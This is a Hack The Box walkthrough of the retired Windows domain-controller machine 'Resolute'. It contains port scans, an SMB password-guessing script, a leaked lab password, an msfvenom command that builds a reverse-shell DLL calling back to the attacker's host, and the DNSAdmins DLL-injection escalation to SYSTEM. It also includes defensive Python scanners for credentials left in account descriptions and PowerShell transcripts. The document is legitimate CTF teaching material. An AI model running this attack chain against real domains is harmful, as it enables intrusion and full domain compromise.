This post documents the complete walkthrough of Resolute, a retired vulnerable VM created by egre55, and hosted at Hack The Box. If you are uncomfortable with spoilers, please stop reading now.
On this post
- Background
- Information Gathering
- Low-Privilege Shell
- Privilege Escalation
- PowerShell transcript
- PowerShell Remoting
- DNSAdmin to DC compromise
- File share accessible by Everyone
- Reverse shell payload generated by msfvenom
- I got SYSTEM shell yo!
- Getting root.txt
Background
Resolute is a retired vulnerable VM from Hack The Box.
Information Gathering
Let’s start with a masscan probe to establish the open ports in the host.
```
# masscan -e tun0 -p1-65535,U:1-65535 10.10.10.169 --rate=1000

Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2019-12-09 11:13:14 GMT
 -- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 61463/udp on 10.10.10.169
Discovered open port 3269/tcp on 10.10.10.169
Discovered open port 88/tcp on 10.10.10.169
Discovered open port 49677/tcp on 10.10.10.169
Discovered open port 49667/tcp on 10.10.10.169
Discovered open port 9389/tcp on 10.10.10.169
Discovered open port 636/tcp on 10.10.10.169
Discovered open port 52115/udp on 10.10.10.169
Discovered open port 445/tcp on 10.10.10.169
Discovered open port 49664/tcp on 10.10.10.169
Discovered open port 53/tcp on 10.10.10.169
Discovered open port 139/tcp on 10.10.10.169
Discovered open port 593/tcp on 10.10.10.169
Discovered open port 49676/tcp on 10.10.10.169
Discovered open port 55256/udp on 10.10.10.169
Discovered open port 54973/udp on 10.10.10.169
Discovered open port 5985/tcp on 10.10.10.169
Discovered open port 49665/tcp on 10.10.10.169
Discovered open port 464/tcp on 10.10.10.169
Discovered open port 47001/tcp on 10.10.10.169
Discovered open port 49666/tcp on 10.10.10.169
Discovered open port 3268/tcp on 10.10.10.169
Discovered open port 49688/tcp on 10.10.10.169
Discovered open port 56921/udp on 10.10.10.169
```
Whoa, it’s a Windows machine alright. Just look at the number of open ports. Let’s do one better with nmap, scanning the discovered ports below 47001 to establish their services.
```
# nmap -n -v -Pn -p53,88,139,445,464,593,636,3268,3269,5985,9389 -A --reason -oN nmap.txt 10.10.10.169
...
PORT     STATE SERVICE      REASON          VERSION
53/tcp   open  domain?      syn-ack ttl 127
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2019-12-09 11:38:42Z)
139/tcp  open  netbios-ssn  syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds syn-ack ttl 127 Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?    syn-ack ttl 127
593/tcp  open  ncacn_http   syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped   syn-ack ttl 127
3268/tcp open  ldap         syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped   syn-ack ttl 127
5985/tcp open  http         syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       syn-ack ttl 127 .NET Message Framing
...
Host script results:
|_clock-skew: mean: 2h47m02s, deviation: 4h37m10s, median: 7m01s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2019-12-09T03:39:14-08:00
| smb-security-mode:
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2019-12-09T11:39:12
|_  start_date: 2019-12-09T11:07:16
```
Let’s see what we can glean from rpcclient with enumdomusers.

That’s a lot of users. We can use some bash-fu to query all users, using rpcclient as the main driver.

```
for user in $(cat users.txt); do rpcclient 10.10.10.169 -U% -c "queryuser $user" 2>/dev/null && echo; done | tee userinfo.txt
```
Something is amiss. Looks like the administrator has forgotten to remove the default password in the description.
With that in mind, let’s write a simple script to test which user hasn’t changed the password yet.
brute.sh

```bash
#!/bin/bash

DOMAIN=megabank.local
HOST=10.10.10.169
NAME=RESOLUTE
USER=$1
PASS=$2

# Called on a hit: kills the outer perl-based runner (e.g. GNU parallel)
# so no further attempts are made once the answer is known.
function die() {
    killall perl 2>/dev/null
}

if smbclient -I "$HOST" -L "$NAME" -U "$DOMAIN/$USER%$PASS" &>/dev/null; then
    echo "[*] User found: $USER"
    echo "[*] Password found: $PASS"
    die
fi
```
So melanie is the one!
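The root cause here is a credential sitting in a free-text account attribute that any authenticated (and, on this box, even anonymous) user can read. Below is an added Python audit script, not part of the original post, that parses the concatenated queryuser output the rpcclient loop writes to userinfo.txt (the `&& echo` leaves a blank line between accounts) and flags every Description or Comment that looks like it carries a password, so those attributes can be scrubbed and the affected accounts rotated. The account names and description text in the sample are constructed for this example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of what the rpcclient loop writes to userinfo.txt.
# Account names and description text are made up for this example.
SAMPLE_USERINFO = (
    "\tUser Name   :\tadministrator\n"
    "\tFull Name   :\t\n"
    "\tDescription :\tBuilt-in account for administering the computer/domain\n"
    "\tComment     :\t\n"
    "\n"
    "\tUser Name   :\tjsmith\n"
    "\tFull Name   :\tJohn Smith\n"
    "\tDescription :\tAccount created. Password set to ChangeMe123!\n"
    "\tComment     :\t\n"
    "\n"
    "\tUser Name   :\tsvc_backup\n"
    "\tFull Name   :\tBackup service\n"
    "\tDescription :\tpwd: B4ckup!Svc (temporary)\n"
    "\tComment     :\tDo not delete\n"
)

# "<key>   :<tab><value>" as printed by rpcclient's queryuser
FIELD_RE = re.compile(r"^\s*([A-Za-z ]+?)\s*:\s?(.*)$")

# Words that usually mean a credential was pasted into a free-text attribute
CREDENTIAL_HINTS = re.compile(
    r"\b(password|passwd|passphrase|pwd|pass|credential|pw)\b", re.IGNORECASE)


def parse_queryuser(text: str) -> List[Dict[str, str]]:
    """Split concatenated queryuser output into one dict per account."""
    users: List[Dict[str, str]] = []
    current: Dict[str, str] = {}
    for line in text.splitlines():
        if not line.strip():          # a blank line separates accounts
            if current:
                users.append(current)
                current = {}
            continue
        m = FIELD_RE.match(line)
        if m:
            current[m.group(1).strip()] = m.group(2).strip()
    if current:
        users.append(current)
    return users


def find_credential_descriptions(text: str) -> List[Tuple[str, str, str]]:
    """Return (account, field, text) for every Description/Comment that looks
    like it carries a credential. These attributes are readable by every
    domain member, so they must never hold secrets."""
    hits: List[Tuple[str, str, str]] = []
    for user in parse_queryuser(text):
        for field in ("Description", "Comment"):
            value = user.get(field, "")
            if value and CREDENTIAL_HINTS.search(value):
                hits.append((user.get("User Name", "?"), field, value))
    return hits


if __name__ == "__main__":
    for account, field, value in find_credential_descriptions(SAMPLE_USERINFO):
        print(f"[!] {account}: {field} = {value!r}")
```

Run against a real userinfo.txt, the two flagged entries are the ones a directory owner should clear first; the built-in administrator description is left alone because it carries no credential hint.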
Low-Privilege Shell
Armed with melanie’s password, let’s see if she can log in to the remote machine via WinRM. Enter Evil-WinRM.

Bingo! The file user.txt is at melanie’s desktop.
Privilege Escalation
During enumeration of melanie’s account, I notice the presence of a PowerShell transcript at C:\PSTranscripts.
PowerShell transcript
What is a PowerShell transcript? A PowerShell transcript is a simple text file that contains a history of all commands and their output. It is similar to Get-History, except that Get-History only displays the input commands, whereas the transcript records the inputs and outputs of all sessions.
Guess who turned it on? And what have we here? ryan’s password: Serv3r4Admin4cc123!.
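Transcription is a good control, but it turns every password typed on a command line into a file on disk, so the transcript directory needs tight ACLs and a routine sweep for secrets. Here is an added Python scanner, not part of the original post, that reads a transcript in the layout Start-Transcript writes (an asterisk-delimited header block, then one block per command), pulls the user and machine from the header, and flags lines that match common credential-on-the-command-line patterns. The transcript below is constructed; the user, host, share and both passwords are placeholders.

```python
import re
from typing import Dict, List, Tuple

# Constructed transcript in the layout Start-Transcript produces. The user,
# host, share and passwords are made-up placeholders.
SAMPLE_TRANSCRIPT = """\
**********************
Windows PowerShell transcript start
Start time: 20191203063201
Username: CORP\\svc_ops
RunAs User: CORP\\svc_ops
Machine: DC01 (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
Process ID: 4120
**********************
Command start time: 20191203063515
**********************
PS>Get-ChildItem C:\\Shares
**********************
Command start time: 20191203063541
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\\\fs01\\backups Example-Pass1! /user:CORP\\svc_ops"
**********************
Command start time: 20191203063602
**********************
PS>$sec = ConvertTo-SecureString 'Example-Pass2!' -AsPlainText -Force
"""

# (label, pattern) pairs; the first match per line wins
SECRET_PATTERNS = [
    ("net use (password is passed on the command line)",
     re.compile(r"\bnet\s+use\b", re.IGNORECASE)),
    ("plaintext ConvertTo-SecureString",
     re.compile(r"ConvertTo-SecureString\s+(?:-String\s+)?['\"]", re.IGNORECASE)),
    ("password passed as a parameter",
     re.compile(r"-(?:Password|Pass|Pwd|Secret)\s+\S+", re.IGNORECASE)),
    ("/user: followed by a password",
     re.compile(r"/user:\S+\s+\S+", re.IGNORECASE)),
    ("key=value secret",
     re.compile(r"\b(?:password|passwd|pwd)\s*[=:]\s*\S+", re.IGNORECASE)),
]


def parse_header(lines: List[str]) -> Dict[str, str]:
    """Read the 'Key: value' rows of the first asterisk-delimited block."""
    header: Dict[str, str] = {}
    in_header = False
    for line in lines:
        if line.startswith("****"):
            if in_header:
                break
            in_header = True
            continue
        if in_header and ": " in line:
            key, value = line.split(": ", 1)
            header[key.strip()] = value.strip()
    return header


def scan_transcript(text: str) -> Tuple[Dict[str, str], List[Tuple[int, str, str]]]:
    """Return the header fields and a list of (line number, label, line)
    for every line that looks like it exposes a credential."""
    lines = text.splitlines()
    header = parse_header(lines)
    findings: List[Tuple[int, str, str]] = []
    for number, line in enumerate(lines, start=1):
        for label, pattern in SECRET_PATTERNS:
            if pattern.search(line):
                findings.append((number, label, line.strip()))
                break
    return header, findings


if __name__ == "__main__":
    header, findings = scan_transcript(SAMPLE_TRANSCRIPT)
    print(f"transcript of {header.get('Username')} on {header.get('Machine')}")
    for number, label, line in findings:
        print(f"  line {number}: {label}: {line}")
```

The header gives you the account whose secret leaked, which is what you need for the rotation ticket; the harmless Get-ChildItem line is not reported.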
PowerShell Remoting
Armed with ryan’s password, we can PS remote into his account like so. And from there spawn a basic command prompt, just to keep things in check.
DNSAdmin to DC compromise
During enumeration of ryan’s account, I notice that ryan is in the DNSAdmins group.
According to this article, in addition to implementing their own DNS server, Microsoft also implemented their own management protocol for it, to allow for easy management and integration with Active Directory domains. As such, it allows us, under some circumstances, to run code as SYSTEM on domain controllers, without being a domain admin.

Long story short, it basically involves injecting a DLL of our choice into dns.exe, the executable behind the DNS Service. It all stems from the fact that dns.exe doesn’t validate the path in ServerLevelPluginDll. Read the article for all the gory details!
Let’s get to work. We need a few things:
- File share accessible by Everyone
- Reverse shell payload generated by msfvenom
File share accessible by Everyone
Here’s the smb.conf I use. Note that the directory permissions have to match the ones in the configuration file, e.g. 777.

smb.conf

```
[global]
workgroup = WORKGROUP
server string = Samba Server %v
netbios name = kali
security = user
map to guest = bad user
name resolve order = bcast host
dns proxy = no
bind interfaces only = yes

[evil]
path = /root/Downloads/resolute/tmp
writable = yes
guest ok = yes
guest only = yes
; "read only" is the inverse of "writable"; the later setting wins, so the
; share ends up read-only, which is all that serving the DLL needs
read only = yes
create mode = 0777
directory mode = 0777
force user = nobody
```
Reverse shell payload generated by msfvenom
The reverse shell payload is located at /root/Downloads/resolute/tmp, i.e. the file share.

```
# msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.183 LPORT=4321 -f dll -o evil.dll
```
I got SYSTEM shell yo!
I didn’t notice it before, but ryan is also in the Remote Management Users group. As such, we can also use Evil-WinRM to get a shell.

With that, we can launch the attack with dnscmd.exe, which is only available in PowerShell for some reason.
Launch the attack like so.
Notice the UNC path points to my file share. We just need to restart the DNS service and a reverse shell with SYSTEM privilege appears in my nc listener.
Awesome!
Getting root.txt
Getting root.txt with a SYSTEM shell is a piece of cake.